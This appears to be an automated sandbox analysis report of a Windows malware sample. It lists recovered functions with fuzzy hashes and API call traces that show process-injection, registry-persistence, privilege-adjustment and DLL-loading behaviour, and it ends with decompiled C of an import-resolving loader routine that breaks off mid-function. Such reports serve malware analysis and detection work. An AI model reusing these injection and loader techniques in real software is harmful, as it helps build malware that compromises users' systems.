  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
